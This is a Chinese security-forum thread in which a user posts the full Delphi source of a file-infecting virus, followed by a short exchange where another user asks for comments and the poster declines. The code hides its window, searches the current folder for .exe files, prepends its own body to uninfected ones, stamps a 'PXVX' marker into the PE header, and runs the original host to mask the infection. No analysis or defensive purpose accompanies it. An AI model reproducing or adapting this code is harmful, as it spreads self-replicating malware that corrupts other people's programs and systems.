|
 | 作者: Winmillion [winmillion]
 论坛用户 |
登录 |
| program XX; {$APPTYPE CONSOLE} uses SysUtils,Windows,ShellApi,TlHelp32; //-----------------------DETERMINE PROCESS EXISTANCE----------------------------- function process_exists(exeFileName: string): Boolean; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := SizeOf(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); Result := False; while Integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then begin Result := True; end; ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; //-----------------------CHECK FILE FOR INFECTION------------------------ function check_infected(hndl:string;size:longint):boolean; var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char; begin hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); i:=0; PE_Header:=0; repeat i:=i+1; ReadFile(hndl2,buf,SizeOf(buf),NBR,0); if buf='PE' then PE_Header:=i; until (i=size) or (PE_Header<>0); SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN); ReadFile(hndl2,sign,SizeOf(sign),NBR,0); if sign='PXVX' then check_infected:=TRUE else check_infected:=FALSE; CloseHandle(hndl2); end; //--------------------WRITE VIRUS SIGN---------------------------------------------- procedure write_sign(hndl:string;size:longint); var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char; begin sign[1]:='P'; sign[2]:='X'; sign[3]:='V'; sign[4]:='X'; i:=0; PE_Header:=0; hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); repeat i:=i+1; ReadFile(hndl2,buf,SizeOf(buf),NBR,0); if buf='PE' then PE_Header:=i; until (i=size) or (PE_HEADER<>0); CloseHandle(hndl2); hndl2:=CreateFile(pchar(hndl),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN); WriteFile(hndl2,sign,SizeOf(sign),NBR,0); CloseHandle(hndl2); end; //--------------------EXECUTE HOST FILE----------------------------------------- procedure exec_host(hndl:string); begin ShellExecute(0,'open',pchar(hndl),nil,nil,SW_SHOWNORMAL); repeat sleep(1000); until process_exists(hndl)=FALSE; end; //---------------------LOAD VIRUS--------------------------------------------- procedure load_virus(hndl:string;virus_size:longint); var buf:char; i:integer; vir_hndl,tmp_hndl,NBR:dword; begin tmp_hndl:=CreateFile(pchar('virus.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to virus_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); CloseHandle(tmp_hndl); end; //---------------------LOAD HOST---------------------------------------------- procedure load_host(hndl:string;virus_size,host_size:longint); var i:integer; buf:char; vir_hndl,tmp_hndl,NBR:dword; begin tmp_hndl:=CreateFile(pchar('host.exe'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); SetFilePointer(vir_hndl,virus_size,0,FILE_BEGIN); for i:=1 to host_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); CloseHandle(tmp_hndl); end; //--------------------------PREPEND--------------------------------------------- procedure prepend(victim,virus:string;virus_size,victim_size:longint); var buf:char; i:integer; vir_hndl,vic_hndl,NBR,target_hndl:dword; begin vir_hndl:=CreateFile(pchar(virus),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to victim_size do begin ReadFile(target_hndl,buf,SizeOf(buf),NBR,0); WriteFile(vic_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vic_hndl); CloseHandle(target_hndl); target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to virus_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(target_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); for i:=1 to victim_size do begin ReadFile(vic_hndl,buf,SizeOf(buf),NBR,0); WriteFile(target_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vic_hndl); SetEndOfFile(target_hndl); CloseHandle(target_hndl); end; //------------------------DELETE TMP FILES-------------------------------- procedure delete_junk; begin DeleteFile(pchar('host.exe')); DeleteFile(pchar('virus.dat')); DeleteFile(pchar('victim.dat')); end; //--------------------------MAIN VIRUS-------------------------------------- const virus_size=44544; var over,exec_flag:boolean; host_size:longint; n:dword; old:string; FileSize:LongWord; target,sr:tsearchrec; Inf_counter:integer; begin ShowWindow(FindWindow(nil,pchar(paramstr(0))),SW_HIDE); Inf_counter:=2; over:=FALSE; n:=FindFirst(paramstr(0),faAnyFile,sr); FileSize:=sr.size; FindClose(n); exec_flag:=TRUE; host_size:=FileSize-virus_size; FindFirst('*.exe',faAnyFile,target); if target.name=ExtractFilename(paramstr(0)) then FindNext(target); repeat if (target.name<>ExtractfileName(paramstr(0))) and (check_infected(target.name,target.size)=FALSE) and (target.name<>'host.exe') then begin if virus_size<>FileSize then begin host_size:=FileSize-virus_size; load_virus(paramstr(0),virus_size); if exec_flag=TRUE then begin load_host(paramstr(0),virus_size,host_size); exec_host('host.exe'); end; exec_flag:=FALSE; prepend(target.name,'virus.dat',virus_size,target.size); Inf_counter:=Inf_counter-1; end else begin load_virus(paramstr(0),virus_size); prepend(target.name,'virus.dat',virus_size,target.size); write_sign(target.name,target.size); Inf_counter:=Inf_counter-1; exec_flag:=FALSE; end end; old:=target.name; FindNext(target); if target.name=old then over:=TRUE; until (Inf_counter=0) or (over=TRUE); if (virus_size<>FileSize) and (exec_flag=TRUE) then begin load_host(paramstr(0),virus_size,host_size); exec_host('host.exe'); end; delete_junk; ExitProcess(0); end. |
| 地主 发表时间: 09-03-24 23:14 |
| 回复: studentol [studentol]  论坛用户 |
登录 |
|
虽然是转载的 (猜测) 为什么不 自己加上注释呢 于人于己 都有好处的 |
| B1层 发表时间: 09-04-03 02:25 |
| 回复: Winmillion [winmillion] 论坛用户 |
登录 |
|
如果能看得懂的人就不需要多加注释了.呵呵!可是在下没有多少时间. |
| B2层 发表时间: 09-04-03 21:57 |
| 回复: studentol [studentol] 论坛用户 |
登录 |
|
呵呵 我看不懂 我可是菜鸟呀 呵呵 既然忙 那就没必要上传了 呵呵 为你着想呀 |
| B3层 发表时间: 09-04-03 23:27 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 感染PE文件Delphi源码